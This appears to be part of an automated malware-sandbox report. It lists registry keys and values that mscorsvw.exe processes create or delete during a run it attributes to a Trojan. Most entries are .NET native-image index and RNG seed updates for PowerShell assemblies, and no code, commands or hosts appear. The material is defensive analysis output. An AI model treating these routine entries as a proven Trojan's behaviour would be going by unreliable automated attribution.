[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 40 77 E6 17 99 09 43 D5 8B 74 82 8C 3B AA A9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "CA 96 20 ED 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
The process mscorsvw.exe:3888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "AC 5D F5 E7 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 36 0F AE 89 A9 15 A7 03 16 C1 18 54 8D 02 A3"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
The process mscorsvw.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F F7 9C 84 49 26 14 9D 13 20 F5 AB 2A D4 F3 5D"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 9B 7F 6B AF 3C 69 4C F3 EA CC D0 3F C4 38 B3"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "58 73 CA E7 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
The process mscorsvw.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 90 1F 3F 34 69 25 5E 22 42 7C 6D 56 78 4C CB"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 12 3C 96 A0 89 34 61 C2 18 F9 26 D6 0E C6 57"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "5E EB A1 E7 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
The process mscorsvw.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 19 92 FE F1 47 C7 06 6A 11 90 7D BE 12 FA 3E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "100"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
"Status" = "0"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
The process mscorsvw.exe:2920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigMask" = "4361"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"MVID" = "E2 17 82 39 6B BC 18 53 A8 67 A6 33 0D FD 66 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\afa163\1f\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ILDependencies" = "57 8D AB 19 D0 02 1A 29 07 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 D3 9B 59 F9 87 EB 71 DF 39 70 FE F5 AA EA 9F"
